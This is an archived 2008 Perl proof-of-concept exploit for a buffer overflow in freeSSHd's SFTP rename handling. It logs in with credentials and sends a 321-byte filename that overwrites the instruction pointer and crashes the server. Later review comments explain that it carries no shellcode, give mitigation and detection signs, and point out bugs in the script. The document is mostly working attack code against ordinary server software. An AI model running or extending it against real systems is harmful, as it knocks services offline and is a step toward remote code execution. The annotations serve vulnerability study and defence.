
freesshd-overflow.txt

2008-10-2300:00:00
r0ut3r
packetstormsecurity.com
`# freeSSHd (rename) Buffer Overflow Vulnerability  
# http://www.milw0rm.com/exploits/6800 <-- Same vuln just further research  
  
# Registers  
# EAX 00000000  
# ECX 41414141  
# EDX 7C9037D8 ntdll.7C9037D8  
# EBX 00000000  
# ESP 001376BC  
# EBP 001376DC  
# ESI 00000000  
# EDI 00000000  
# EIP 41414141 <-- Pwned  
  
# Part of the string is passed to various functions and eventually overwrites EIP.   
# In order to exploit some patching needs to occur. I've been trying to exploit   
# this vulnerability on and off in my spare time.   
#  
# 0day for 3 months :)  
#  
# Written by r0ut3r (writ3r [at] gmail.com)  
  
# Summary for reviewers / defenders:
#   This is a 2008 crash proof-of-concept, not a code-execution exploit: the
#   register dump above shows EIP overwritten with 0x41414141 (the 'A' filler),
#   and the payload below carries no shellcode. The script authenticates to the
#   SSH server with a valid username/password and then issues a single SFTP
#   RENAME whose source name is 321 bytes (317 x 'A' followed by 'BBBB').
#   Because authentication happens first, the attack surface is post-auth:
#   it requires working credentials on the target. Mitigation is updating the
#   affected freeSSHd build (see the milw0rm reference above; no fixed version is
#   named on this page) and limiting SFTP access to trusted accounts. A rename
#   request with a multi-hundred-byte path component, followed by the SSH/SFTP
#   service crashing, is the observable signature on the server side.
#
# NOTE(review): the script has no `use strict; use warnings;`, which is why the
# undeclared-variable mistake further down goes unnoticed at runtime.
use Net::SSH2;  
  
# Credentials used for the password authentication step (must be valid).
my $user = "root";  
my $pass = "yahh";  
  
# Target host and SSH port.
my $ip = "127.0.0.1";  
my $port = 22;  
  
my $ssh2 = Net::SSH2->new();  
  
print "[+] Connecting...\n";  
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";  
# NOTE(review): the right-hand side of this `||` is a bare string, not a die,
# so a failed authentication is silently ignored and the script carries on.
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";  
print "[+] Sending payload\n";  
  
# Filler plus a 4-byte marker; total length 321 bytes. The 'BBBB' marker is
# a placeholder, not a working return address.
my $junk = 'A' x 317;  
my $eip = 'BBBB';  
  
# NOTE(review): $payload is printed before it is declared/assigned on the next
# line, so under this (strict-less) script the print emits nothing.
print $payload;  
my $payload = $junk.$eip;  
  
# The oversized string is sent as the source name of an SFTP RENAME request;
# the destination name is a single byte.
my $sftp = $ssh2->sftp();  
$sftp->rename($payload, 'B');  
  
print "[+] Sent";  
$ssh2->disconnect;  